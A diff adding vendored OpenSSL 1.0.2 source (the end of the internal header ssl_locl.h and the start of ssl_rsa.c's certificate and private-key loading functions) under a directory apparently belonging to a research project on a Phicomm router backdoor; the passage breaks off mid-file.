+long ssl3_callback_ctrl(SSL *s, int cmd, void (*fp) (void));
+long ssl3_ctx_callback_ctrl(SSL_CTX *s, int cmd, void (*fp) (void));
+int ssl3_pending(const SSL *s);
+
+void ssl3_record_sequence_update(unsigned char *seq);
+int ssl3_do_change_cipher_spec(SSL *ssl);
+long ssl3_default_timeout(void);
+
+void ssl3_set_handshake_header(SSL *s, int htype, unsigned long len);
+int ssl3_handshake_write(SSL *s);
+
+int ssl23_num_ciphers(void);
+const SSL_CIPHER *ssl23_get_cipher(unsigned int u);
+int ssl23_read(SSL *s, void *buf, int len);
+int ssl23_peek(SSL *s, void *buf, int len);
+int ssl23_write(SSL *s, const void *buf, int len);
+int ssl23_put_cipher_by_char(const SSL_CIPHER *c, unsigned char *p);
+const SSL_CIPHER *ssl23_get_cipher_by_char(const unsigned char *p);
+long ssl23_default_timeout(void);
+
+long tls1_default_timeout(void);
+int dtls1_do_write(SSL *s, int type);
+int ssl3_read_n(SSL *s, int n, int max, int extend);
+int dtls1_read_bytes(SSL *s, int type, unsigned char *buf, int len, int peek);
+int ssl3_do_compress(SSL *ssl);
+int ssl3_do_uncompress(SSL *ssl);
+int ssl3_write_pending(SSL *s, int type, const unsigned char *buf,
+                       unsigned int len);
+unsigned char *dtls1_set_message_header(SSL *s,
+                                        unsigned char *p, unsigned char mt,
+                                        unsigned long len,
+                                        unsigned long frag_off,
+                                        unsigned long frag_len);
+
+int dtls1_write_app_data_bytes(SSL *s, int type, const void *buf, int len);
+int dtls1_write_bytes(SSL *s, int type, const void *buf, int len);
+
+int dtls1_send_change_cipher_spec(SSL *s, int a, int b);
+int dtls1_send_finished(SSL *s, int a, int b, const char *sender, int slen);
+int dtls1_read_failed(SSL *s, int code);
+int dtls1_buffer_message(SSL *s, int ccs);
+int dtls1_retransmit_message(SSL *s, unsigned short seq,
+                             unsigned long frag_off, int *found);
+int dtls1_get_queue_priority(unsigned short seq, int is_ccs);
+int dtls1_retransmit_buffered_messages(SSL *s);
+void dtls1_clear_record_buffer(SSL *s);
+void dtls1_get_message_header(unsigned char *data,
+                              struct hm_header_st *msg_hdr);
+void dtls1_get_ccs_header(unsigned char *data, struct ccs_header_st *ccs_hdr);
+void dtls1_reset_seq_numbers(SSL *s, int rw);
+long dtls1_default_timeout(void);
+struct timeval *dtls1_get_timeout(SSL *s, struct timeval *timeleft);
+int dtls1_check_timeout_num(SSL *s);
+int dtls1_handle_timeout(SSL *s);
+const SSL_CIPHER *dtls1_get_cipher(unsigned int u);
+void dtls1_start_timer(SSL *s);
+void dtls1_stop_timer(SSL *s);
+int dtls1_is_timer_expired(SSL *s);
+void dtls1_double_timeout(SSL *s);
+int dtls1_send_newsession_ticket(SSL *s);
+unsigned int dtls1_min_mtu(SSL *s);
+unsigned int dtls1_link_min_mtu(void);
+void dtls1_hm_fragment_free(hm_fragment *frag);
+
+/* some client-only functions */
+int ssl3_client_hello(SSL *s);
+int ssl3_get_server_hello(SSL *s);
+int ssl3_get_certificate_request(SSL *s);
+int ssl3_get_new_session_ticket(SSL *s);
+int ssl3_get_cert_status(SSL *s);
+int ssl3_get_server_done(SSL *s);
+int ssl3_send_client_verify(SSL *s);
+int ssl3_send_client_certificate(SSL *s);
+int ssl_do_client_cert_cb(SSL *s, X509 **px509, EVP_PKEY **ppkey);
+int ssl3_send_client_key_exchange(SSL *s);
+int ssl3_get_key_exchange(SSL *s);
+int ssl3_get_server_certificate(SSL *s);
+int ssl3_check_cert_and_algorithm(SSL *s);
+#  ifndef OPENSSL_NO_TLSEXT
+#   ifndef OPENSSL_NO_NEXTPROTONEG
+int ssl3_send_next_proto(SSL *s);
+#   endif
+#  endif
+
+int dtls1_client_hello(SSL *s);
+
+/* some server-only functions */
+int ssl3_get_client_hello(SSL *s);
+int ssl3_send_server_hello(SSL *s);
+int ssl3_send_hello_request(SSL *s);
+int ssl3_send_server_key_exchange(SSL *s);
+int ssl3_send_certificate_request(SSL *s);
+int ssl3_send_server_done(SSL *s);
+int ssl3_get_client_certificate(SSL *s);
+int ssl3_get_client_key_exchange(SSL *s);
+int ssl3_get_cert_verify(SSL *s);
+#  ifndef OPENSSL_NO_NEXTPROTONEG
+int ssl3_get_next_proto(SSL *s);
+#  endif
+
+int ssl23_accept(SSL *s);
+int ssl23_connect(SSL *s);
+int ssl23_read_bytes(SSL *s, int n);
+int ssl23_write_bytes(SSL *s);
+
+int tls1_new(SSL *s);
+void tls1_free(SSL *s);
+void tls1_clear(SSL *s);
+long tls1_ctrl(SSL *s, int cmd, long larg, void *parg);
+long tls1_callback_ctrl(SSL *s, int cmd, void (*fp) (void));
+
+int dtls1_new(SSL *s);
+int dtls1_accept(SSL *s);
+int dtls1_connect(SSL *s);
+void dtls1_free(SSL *s);
+void dtls1_clear(SSL *s);
+long dtls1_ctrl(SSL *s, int cmd, long larg, void *parg);
+int dtls1_shutdown(SSL *s);
+
+long dtls1_get_message(SSL *s, int st1, int stn, int mt, long max, int *ok);
+int dtls1_get_record(SSL *s);
+int do_dtls1_write(SSL *s, int type, const unsigned char *buf,
+                   unsigned int len, int create_empty_fragement);
+int dtls1_dispatch_alert(SSL *s);
+
+int ssl_init_wbio_buffer(SSL *s, int push);
+void ssl_free_wbio_buffer(SSL *s);
+
+int tls1_change_cipher_state(SSL *s, int which);
+int tls1_setup_key_block(SSL *s);
+int tls1_enc(SSL *s, int snd);
+int tls1_final_finish_mac(SSL *s,
+                          const char *str, int slen, unsigned char *p);
+int tls1_cert_verify_mac(SSL *s, int md_nid, unsigned char *p);
+int tls1_mac(SSL *ssl, unsigned char *md, int snd);
+int tls1_generate_master_secret(SSL *s, unsigned char *out,
+                                unsigned char *p, int len);
+int tls1_export_keying_material(SSL *s, unsigned char *out, size_t olen,
+                                const char *label, size_t llen,
+                                const unsigned char *p, size_t plen,
+                                int use_context);
+int tls1_alert_code(int code);
+int ssl3_alert_code(int code);
+int ssl_ok(SSL *s);
+
+#  ifndef OPENSSL_NO_ECDH
+int ssl_check_srvr_ecc_cert_and_alg(X509 *x, SSL *s);
+#  endif
+
+SSL_COMP *ssl3_comp_find(STACK_OF(SSL_COMP) *sk, int n);
+
+#  ifndef OPENSSL_NO_EC
+int tls1_ec_curve_id2nid(int curve_id);
+int tls1_ec_nid2curve_id(int nid);
+int tls1_check_curve(SSL *s, const unsigned char *p, size_t len);
+int tls1_shared_curve(SSL *s, int nmatch);
+int tls1_set_curves(unsigned char **pext, size_t *pextlen,
+                    int *curves, size_t ncurves);
+int tls1_set_curves_list(unsigned char **pext, size_t *pextlen,
+                         const char *str);
+#   ifndef OPENSSL_NO_ECDH
+int tls1_check_ec_tmp_key(SSL *s, unsigned long id);
+#   endif                       /* OPENSSL_NO_ECDH */
+#  endif                        /* OPENSSL_NO_EC */
+
+#  ifndef OPENSSL_NO_TLSEXT
+int tls1_shared_list(SSL *s,
+                     const unsigned char *l1, size_t l1len,
+                     const unsigned char *l2, size_t l2len, int nmatch);
+unsigned char *ssl_add_clienthello_tlsext(SSL *s, unsigned char *buf,
+                                          unsigned char *limit, int *al);
+unsigned char *ssl_add_serverhello_tlsext(SSL *s, unsigned char *buf,
+                                          unsigned char *limit, int *al);
+int ssl_parse_clienthello_tlsext(SSL *s, unsigned char **data,
+                                 unsigned char *d, int n);
+int tls1_set_server_sigalgs(SSL *s);
+int ssl_check_clienthello_tlsext_late(SSL *s);
+int ssl_parse_serverhello_tlsext(SSL *s, unsigned char **data,
+                                 unsigned char *d, int n);
+int ssl_prepare_clienthello_tlsext(SSL *s);
+int ssl_prepare_serverhello_tlsext(SSL *s);
+
+#   ifndef OPENSSL_NO_HEARTBEATS
+int tls1_heartbeat(SSL *s);
+int dtls1_heartbeat(SSL *s);
+int tls1_process_heartbeat(SSL *s);
+int dtls1_process_heartbeat(SSL *s);
+#   endif
+
+#   ifdef OPENSSL_NO_SHA256
+#    define tlsext_tick_md  EVP_sha1
+#   else
+#    define tlsext_tick_md  EVP_sha256
+#   endif
+int tls1_process_ticket(SSL *s, unsigned char *session_id, int len,
+                        const unsigned char *limit, SSL_SESSION **ret);
+
+int tls12_get_sigandhash(unsigned char *p, const EVP_PKEY *pk,
+                         const EVP_MD *md);
+int tls12_get_sigid(const EVP_PKEY *pk);
+const EVP_MD *tls12_get_hash(unsigned char hash_alg);
+
+int tls1_set_sigalgs_list(CERT *c, const char *str, int client);
+int tls1_set_sigalgs(CERT *c, const int *salg, size_t salglen, int client);
+int tls1_check_chain(SSL *s, X509 *x, EVP_PKEY *pk, STACK_OF(X509) *chain,
+                     int idx);
+void tls1_set_cert_validity(SSL *s);
+
+#  endif
+EVP_MD_CTX *ssl_replace_hash(EVP_MD_CTX **hash, const EVP_MD *md);
+void ssl_clear_hash_ctx(EVP_MD_CTX **hash);
+int ssl_add_serverhello_renegotiate_ext(SSL *s, unsigned char *p, int *len,
+                                        int maxlen);
+int ssl_parse_serverhello_renegotiate_ext(SSL *s, unsigned char *d, int len,
+                                          int *al);
+int ssl_add_clienthello_renegotiate_ext(SSL *s, unsigned char *p, int *len,
+                                        int maxlen);
+int ssl_parse_clienthello_renegotiate_ext(SSL *s, unsigned char *d, int len,
+                                          int *al);
+long ssl_get_algorithm2(SSL *s);
+int tls1_save_sigalgs(SSL *s, const unsigned char *data, int dsize);
+int tls1_process_sigalgs(SSL *s);
+size_t tls12_get_psigalgs(SSL *s, const unsigned char **psigs);
+int tls12_check_peer_sigalg(const EVP_MD **pmd, SSL *s,
+                            const unsigned char *sig, EVP_PKEY *pkey);
+void ssl_set_client_disabled(SSL *s);
+
+int ssl_add_clienthello_use_srtp_ext(SSL *s, unsigned char *p, int *len,
+                                     int maxlen);
+int ssl_parse_clienthello_use_srtp_ext(SSL *s, unsigned char *d, int len,
+                                       int *al);
+int ssl_add_serverhello_use_srtp_ext(SSL *s, unsigned char *p, int *len,
+                                     int maxlen);
+int ssl_parse_serverhello_use_srtp_ext(SSL *s, unsigned char *d, int len,
+                                       int *al);
+
+/* s3_cbc.c */
+void ssl3_cbc_copy_mac(unsigned char *out,
+                       const SSL3_RECORD *rec,
+                       unsigned md_size, unsigned orig_len);
+int ssl3_cbc_remove_padding(const SSL *s,
+                            SSL3_RECORD *rec,
+                            unsigned block_size, unsigned mac_size);
+int tls1_cbc_remove_padding(const SSL *s,
+                            SSL3_RECORD *rec,
+                            unsigned block_size, unsigned mac_size);
+char ssl3_cbc_record_digest_supported(const EVP_MD_CTX *ctx);
+void ssl3_cbc_digest_record(const EVP_MD_CTX *ctx,
+                            unsigned char *md_out,
+                            size_t *md_out_size,
+                            const unsigned char header[13],
+                            const unsigned char *data,
+                            size_t data_plus_mac_size,
+                            size_t data_plus_mac_plus_padding_size,
+                            const unsigned char *mac_secret,
+                            unsigned mac_secret_length, char is_sslv3);
+
+void tls_fips_digest_extra(const EVP_CIPHER_CTX *cipher_ctx,
+                           EVP_MD_CTX *mac_ctx, const unsigned char *data,
+                           size_t data_len, size_t orig_len);
+
+int srp_verify_server_param(SSL *s, int *al);
+
+/* t1_ext.c */
+
+void custom_ext_init(custom_ext_methods *meths);
+
+int custom_ext_parse(SSL *s, int server,
+                     unsigned int ext_type,
+                     const unsigned char *ext_data, size_t ext_size, int *al);
+int custom_ext_add(SSL *s, int server,
+                   unsigned char **pret, unsigned char *limit, int *al);
+
+int custom_exts_copy(custom_ext_methods *dst, const custom_ext_methods *src);
+void custom_exts_free(custom_ext_methods *exts);
+
+# else
+
+#  define ssl_init_wbio_buffer SSL_test_functions()->p_ssl_init_wbio_buffer
+#  define ssl3_setup_buffers SSL_test_functions()->p_ssl3_setup_buffers
+#  define tls1_process_heartbeat SSL_test_functions()->p_tls1_process_heartbeat
+#  define dtls1_process_heartbeat SSL_test_functions()->p_dtls1_process_heartbeat
+
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_rsa.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_rsa.c
new file mode 100644
index 0000000..b1b2318
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_rsa.c
@@ -0,0 +1,1008 @@
+/* ssl/ssl_rsa.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/bio.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+
+static int ssl_set_cert(CERT *c, X509 *x509);
+static int ssl_set_pkey(CERT *c, EVP_PKEY *pkey);
+int SSL_use_certificate(SSL *ssl, X509 *x)
+{
+    if (x == NULL) {
+        SSLerr(SSL_F_SSL_USE_CERTIFICATE, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (!ssl_cert_inst(&ssl->cert)) {
+        SSLerr(SSL_F_SSL_USE_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    return (ssl_set_cert(ssl->cert, x));
+}
+
+#ifndef OPENSSL_NO_STDIO
+int SSL_use_certificate_file(SSL *ssl, const char *file, int type)
+{
+    int j;
+    BIO *in;
+    int ret = 0;
+    X509 *x = NULL;
+
+    in = BIO_new(BIO_s_file_internal());
+    if (in == NULL) {
+        SSLerr(SSL_F_SSL_USE_CERTIFICATE_FILE, ERR_R_BUF_LIB);
+        goto end;
+    }
+
+    if (BIO_read_filename(in, file) <= 0) {
+        SSLerr(SSL_F_SSL_USE_CERTIFICATE_FILE, ERR_R_SYS_LIB);
+        goto end;
+    }
+    if (type == SSL_FILETYPE_ASN1) {
+        j = ERR_R_ASN1_LIB;
+        x = d2i_X509_bio(in, NULL);
+    } else if (type == SSL_FILETYPE_PEM) {
+        j = ERR_R_PEM_LIB;
+        x = PEM_read_bio_X509(in, NULL, ssl->ctx->default_passwd_callback,
+                              ssl->ctx->default_passwd_callback_userdata);
+    } else {
+        SSLerr(SSL_F_SSL_USE_CERTIFICATE_FILE, SSL_R_BAD_SSL_FILETYPE);
+        goto end;
+    }
+
+    if (x == NULL) {
+        SSLerr(SSL_F_SSL_USE_CERTIFICATE_FILE, j);
+        goto end;
+    }
+
+    ret = SSL_use_certificate(ssl, x);
+ end:
+    if (x != NULL)
+        X509_free(x);
+    if (in != NULL)
+        BIO_free(in);
+    return (ret);
+}
+#endif
+
+int SSL_use_certificate_ASN1(SSL *ssl, const unsigned char *d, int len)
+{
+    X509 *x;
+    int ret;
+
+    x = d2i_X509(NULL, &d, (long)len);
+    if (x == NULL) {
+        SSLerr(SSL_F_SSL_USE_CERTIFICATE_ASN1, ERR_R_ASN1_LIB);
+        return (0);
+    }
+
+    ret = SSL_use_certificate(ssl, x);
+    X509_free(x);
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_RSA
+int SSL_use_RSAPrivateKey(SSL *ssl, RSA *rsa)
+{
+    EVP_PKEY *pkey;
+    int ret;
+
+    if (rsa == NULL) {
+        SSLerr(SSL_F_SSL_USE_RSAPRIVATEKEY, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (!ssl_cert_inst(&ssl->cert)) {
+        SSLerr(SSL_F_SSL_USE_RSAPRIVATEKEY, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    if ((pkey = EVP_PKEY_new()) == NULL) {
+        SSLerr(SSL_F_SSL_USE_RSAPRIVATEKEY, ERR_R_EVP_LIB);
+        return (0);
+    }
+
+    RSA_up_ref(rsa);
+    EVP_PKEY_assign_RSA(pkey, rsa);
+
+    ret = ssl_set_pkey(ssl->cert, pkey);
+    EVP_PKEY_free(pkey);
+    return (ret);
+}
+#endif
+
+static int ssl_set_pkey(CERT *c, EVP_PKEY *pkey)
+{
+    int i;
+    /*
+     * Special case for DH: check two DH certificate types for a match. This
+     * means for DH certificates we must set the certificate first.
+     */
+    if (pkey->type == EVP_PKEY_DH) {
+        X509 *x;
+        i = -1;
+        x = c->pkeys[SSL_PKEY_DH_RSA].x509;
+        if (x && X509_check_private_key(x, pkey))
+            i = SSL_PKEY_DH_RSA;
+        x = c->pkeys[SSL_PKEY_DH_DSA].x509;
+        if (i == -1 && x && X509_check_private_key(x, pkey))
+            i = SSL_PKEY_DH_DSA;
+        ERR_clear_error();
+    } else
+        i = ssl_cert_type(NULL, pkey);
+    if (i < 0) {
+        SSLerr(SSL_F_SSL_SET_PKEY, SSL_R_UNKNOWN_CERTIFICATE_TYPE);
+        return (0);
+    }
+
+    if (c->pkeys[i].x509 != NULL) {
+        EVP_PKEY *pktmp;
+        pktmp = X509_get_pubkey(c->pkeys[i].x509);
+        EVP_PKEY_copy_parameters(pktmp, pkey);
+        EVP_PKEY_free(pktmp);
+        ERR_clear_error();
+
+#ifndef OPENSSL_NO_RSA
+        /*
+         * Don't check the public/private key, this is mostly for smart
+         * cards.
+         */
+        if ((pkey->type == EVP_PKEY_RSA) &&
+            (RSA_flags(pkey->pkey.rsa) & RSA_METHOD_FLAG_NO_CHECK)) ;
+        else
+#endif
+        if (!X509_check_private_key(c->pkeys[i].x509, pkey)) {
+            X509_free(c->pkeys[i].x509);
+            c->pkeys[i].x509 = NULL;
+            return 0;
+        }
+    }
+
+    if (c->pkeys[i].privatekey != NULL)
+        EVP_PKEY_free(c->pkeys[i].privatekey);
+    CRYPTO_add(&pkey->references, 1, CRYPTO_LOCK_EVP_PKEY);
+    c->pkeys[i].privatekey = pkey;
+    c->key = &(c->pkeys[i]);
+
+    c->valid = 0;
+    return (1);
+}
+
+#ifndef OPENSSL_NO_RSA
+# ifndef OPENSSL_NO_STDIO
+int SSL_use_RSAPrivateKey_file(SSL *ssl, const char *file, int type)
+{
+    int j, ret = 0;
+    BIO *in;
+    RSA *rsa = NULL;
+
+    in = BIO_new(BIO_s_file_internal());
+    if (in == NULL) {
+        SSLerr(SSL_F_SSL_USE_RSAPRIVATEKEY_FILE, ERR_R_BUF_LIB);
+        goto end;
+    }
+
+    if (BIO_read_filename(in, file) <= 0) {
+        SSLerr(SSL_F_SSL_USE_RSAPRIVATEKEY_FILE, ERR_R_SYS_LIB);
+        goto end;
+    }
+    if (type == SSL_FILETYPE_ASN1) {
+        j = ERR_R_ASN1_LIB;
+        rsa = d2i_RSAPrivateKey_bio(in, NULL);
+    } else if (type == SSL_FILETYPE_PEM) {
+        j = ERR_R_PEM_LIB;
+        rsa = PEM_read_bio_RSAPrivateKey(in, NULL,
+                                         ssl->ctx->default_passwd_callback,
+                                         ssl->
+                                         ctx->default_passwd_callback_userdata);
+    } else {
+        SSLerr(SSL_F_SSL_USE_RSAPRIVATEKEY_FILE, SSL_R_BAD_SSL_FILETYPE);
+        goto end;
+    }
+    if (rsa == NULL) {
+        SSLerr(SSL_F_SSL_USE_RSAPRIVATEKEY_FILE, j);
+        goto end;
+    }
+    ret = SSL_use_RSAPrivateKey(ssl, rsa);
+    RSA_free(rsa);
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    return (ret);
+}
+# endif
+
+int SSL_use_RSAPrivateKey_ASN1(SSL *ssl, unsigned char *d, long len)
+{
+    int ret;
+    const unsigned char *p;
+    RSA *rsa;
+
+    p = d;
+    if ((rsa = d2i_RSAPrivateKey(NULL, &p, (long)len)) == NULL) {
+        SSLerr(SSL_F_SSL_USE_RSAPRIVATEKEY_ASN1, ERR_R_ASN1_LIB);
+        return (0);
+    }
+
+    ret = SSL_use_RSAPrivateKey(ssl, rsa);
+    RSA_free(rsa);
+    return (ret);
+}
+#endif                          /* !OPENSSL_NO_RSA */
+
+int SSL_use_PrivateKey(SSL *ssl, EVP_PKEY *pkey)
+{
+    int ret;
+
+    if (pkey == NULL) {
+        SSLerr(SSL_F_SSL_USE_PRIVATEKEY, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (!ssl_cert_inst(&ssl->cert)) {
+        SSLerr(SSL_F_SSL_USE_PRIVATEKEY, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    ret = ssl_set_pkey(ssl->cert, pkey);
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_STDIO
+int SSL_use_PrivateKey_file(SSL *ssl, const char *file, int type)
+{
+    int j, ret = 0;
+    BIO *in;
+    EVP_PKEY *pkey = NULL;
+
+    in = BIO_new(BIO_s_file_internal());
+    if (in == NULL) {
+        SSLerr(SSL_F_SSL_USE_PRIVATEKEY_FILE, ERR_R_BUF_LIB);
+        goto end;
+    }
+
+    if (BIO_read_filename(in, file) <= 0) {
+        SSLerr(SSL_F_SSL_USE_PRIVATEKEY_FILE, ERR_R_SYS_LIB);
+        goto end;
+    }
+    if (type == SSL_FILETYPE_PEM) {
+        j = ERR_R_PEM_LIB;
+        pkey = PEM_read_bio_PrivateKey(in, NULL,
+                                       ssl->ctx->default_passwd_callback,
+                                       ssl->
+                                       ctx->default_passwd_callback_userdata);
+    } else if (type == SSL_FILETYPE_ASN1) {
+        j = ERR_R_ASN1_LIB;
+        pkey = d2i_PrivateKey_bio(in, NULL);
+    } else {
+        SSLerr(SSL_F_SSL_USE_PRIVATEKEY_FILE, SSL_R_BAD_SSL_FILETYPE);
+        goto end;
+    }
+    if (pkey == NULL) {
+        SSLerr(SSL_F_SSL_USE_PRIVATEKEY_FILE, j);
+        goto end;
+    }
+    ret = SSL_use_PrivateKey(ssl, pkey);
+    EVP_PKEY_free(pkey);
+ end:
+    if (in != NULL)
+        BIO_free(in);
+    return (ret);
+}
+#endif
+
+int SSL_use_PrivateKey_ASN1(int type, SSL *ssl, const unsigned char *d,
+                            long len)
+{
+    int ret;
+    const unsigned char *p;
+    EVP_PKEY *pkey;
+
+    p = d;
+    if ((pkey = d2i_PrivateKey(type, NULL, &p, (long)len)) == NULL) {
+        SSLerr(SSL_F_SSL_USE_PRIVATEKEY_ASN1, ERR_R_ASN1_LIB);
+        return (0);
+    }
+
+    ret = SSL_use_PrivateKey(ssl, pkey);
+    EVP_PKEY_free(pkey);
+    return (ret);
+}
+
+int SSL_CTX_use_certificate(SSL_CTX *ctx, X509 *x)
+{
+    if (x == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (!ssl_cert_inst(&ctx->cert)) {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    return (ssl_set_cert(ctx->cert, x));
+}
+
+static int ssl_set_cert(CERT *c, X509 *x)
+{
+    EVP_PKEY *pkey;
+    int i;
+
+    pkey = X509_get_pubkey(x);
+    if (pkey == NULL) {
+        SSLerr(SSL_F_SSL_SET_CERT, SSL_R_X509_LIB);
+        return (0);
+    }
+
+    i = ssl_cert_type(x, pkey);
+    if (i < 0) {
+        SSLerr(SSL_F_SSL_SET_CERT, SSL_R_UNKNOWN_CERTIFICATE_TYPE);
+        EVP_PKEY_free(pkey);
+        return (0);
+    }
+
+    if (c->pkeys[i].privatekey != NULL) {
+        EVP_PKEY_copy_parameters(pkey, c->pkeys[i].privatekey);
+        ERR_clear_error();
+
+#ifndef OPENSSL_NO_RSA
+        /*
+         * Don't check the public/private key, this is mostly for smart
+         * cards.
+         */
+        if ((c->pkeys[i].privatekey->type == EVP_PKEY_RSA) &&
+            (RSA_flags(c->pkeys[i].privatekey->pkey.rsa) &
+             RSA_METHOD_FLAG_NO_CHECK)) ;
+        else
+#endif                          /* OPENSSL_NO_RSA */
+        if (!X509_check_private_key(x, c->pkeys[i].privatekey)) {
+            /*
+             * don't fail for a cert/key mismatch, just free current private
+             * key (when switching to a different cert & key, first this
+             * function should be used, then ssl_set_pkey
+             */
+            EVP_PKEY_free(c->pkeys[i].privatekey);
+            c->pkeys[i].privatekey = NULL;
+            /* clear error queue */
+            ERR_clear_error();
+        }
+    }
+
+    EVP_PKEY_free(pkey);
+
+    if (c->pkeys[i].x509 != NULL)
+        X509_free(c->pkeys[i].x509);
+    CRYPTO_add(&x->references, 1, CRYPTO_LOCK_X509);
+    c->pkeys[i].x509 = x;
+    c->key = &(c->pkeys[i]);
+
+    c->valid = 0;
+    return (1);
+}
+
+#ifndef OPENSSL_NO_STDIO
+int SSL_CTX_use_certificate_file(SSL_CTX *ctx, const char *file, int type)
+{
+    int j;
+    BIO *in;
+    int ret = 0;
+    X509 *x = NULL;
+
+    in = BIO_new(BIO_s_file_internal());
+    if (in == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE_FILE, ERR_R_BUF_LIB);
+        goto end;
+    }
+
+    if (BIO_read_filename(in, file) <= 0) {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE_FILE, ERR_R_SYS_LIB);
+        goto end;
+    }
+    if (type == SSL_FILETYPE_ASN1) {
+        j = ERR_R_ASN1_LIB;
+        x = d2i_X509_bio(in, NULL);
+    } else if (type == SSL_FILETYPE_PEM) {
+        j = ERR_R_PEM_LIB;
+        x = PEM_read_bio_X509(in, NULL, ctx->default_passwd_callback,
+                              ctx->default_passwd_callback_userdata);
+    } else {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE_FILE, SSL_R_BAD_SSL_FILETYPE);
+        goto end;
+    }
+
+    if (x == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE_FILE, j);
+        goto end;
+    }
+
+    ret = SSL_CTX_use_certificate(ctx, x);
+ end:
+    if (x != NULL)
+        X509_free(x);
+    if (in != NULL)
+        BIO_free(in);
+    return (ret);
+}
+#endif
+
+int SSL_CTX_use_certificate_ASN1(SSL_CTX *ctx, int len,
+                                 const unsigned char *d)
+{
+    X509 *x;
+    int ret;
+
+    x = d2i_X509(NULL, &d, (long)len);
+    if (x == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_CERTIFICATE_ASN1, ERR_R_ASN1_LIB);
+        return (0);
+    }
+
+    ret = SSL_CTX_use_certificate(ctx, x);
+    X509_free(x);
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_RSA
+int SSL_CTX_use_RSAPrivateKey(SSL_CTX *ctx, RSA *rsa)
+{
+    int ret;
+    EVP_PKEY *pkey;
+
+    if (rsa == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY, ERR_R_PASSED_NULL_PARAMETER);
+        return (0);
+    }
+    if (!ssl_cert_inst(&ctx->cert)) {
+        SSLerr(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    if ((pkey = EVP_PKEY_new()) == NULL) {
+        SSLerr(SSL_F_SSL_CTX_USE_RSAPRIVATEKEY, ERR_R_EVP_LIB);
+        return (0);
+    }
+
+    RSA_up_ref(rsa);
+    EVP_PKEY_assign_RSA(pkey, rsa);
+
+    ret = ssl_set_pkey(ctx->cert, pkey);
+    EVP_PKEY_free(pkey);
+    return (ret);
+}
+
+# ifndef OPENSSL_NO_STDIO
